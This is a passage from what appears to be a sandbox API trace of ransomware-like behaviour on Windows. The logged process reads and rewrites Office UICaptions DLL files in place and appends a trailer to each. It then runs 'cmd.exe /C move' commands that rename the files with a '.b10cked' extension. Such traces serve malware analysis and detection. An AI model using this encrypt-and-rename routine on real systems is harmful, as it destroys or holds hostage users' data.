lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21373515604) returned 1 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2b60 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0156.946] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2b60 [0156.947] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.948] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2678 [0156.948] ReadFile (in: 
hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2b60 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0156.984] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.985] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2b60 [0156.985] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.985] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.985] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x15af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x15af, lpOverlapped=0x0) returned 1 [0156.988] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.988] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x15af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x15af, lpOverlapped=0x0) returned 1 [0156.988] SetFilePointer (in: hFile=0x114, lDistanceToMove=-5551, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x15b1 [0156.988] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x15af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x15af, lpOverlapped=0x0) returned 1 [0156.988] SetFilePointer (in: hFile=0x114, lDistanceToMove=-5551, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x15b1 [0156.988] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x15af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x15af, lpOverlapped=0x0) returned 1 [0156.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0156.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLWVW.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0156.993] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2b60 [0156.993] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, 
lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0156.994] CloseHandle (hObject=0x114) returned 1 [0156.994] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX") returned 0x3c [0156.995] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0156.996] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xd8c, dwThreadId=0x3dc)) returned 1 [0157.002] CloseHandle (hObject=0x1b4) returned 1 [0157.002] CloseHandle (hObject=0x114) returned 1 [0157.002] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 
| out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.002] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.002] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0157.002] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.002] ReleaseMutex (hMutex=0xf8) returned 1 [0157.002] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.002] ReleaseMutex (hMutex=0xf8) returned 1 [0157.002] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.002] ReleaseMutex (hMutex=0xf8) returned 1 [0157.002] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.002] ReleaseMutex (hMutex=0xf8) returned 1 [0157.002] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] QueryPerformanceCounter (in: 
lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21419819951) returned 1 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xcd60 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xc878 [0157.410] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0157.438] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0157.438] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xcd60 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xcd60 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.439] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x66af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x66af, lpOverlapped=0x0) returned 1 [0157.465] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.465] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x66af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x66af, lpOverlapped=0x0) returned 1 [0157.466] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26287, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x66b1 [0157.466] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x66af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x66af, lpOverlapped=0x0) returned 1 [0157.482] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26287, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x66b1 [0157.482] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x66af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesWritten=0x12ec1c*=0x66af, lpOverlapped=0x0) returned 1 [0157.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0157.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0157.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xcd60 [0157.486] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0157.486] CloseHandle (hObject=0x114) returned 1 [0157.487] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX") returned 0x3c [0157.488] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0157.489] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 
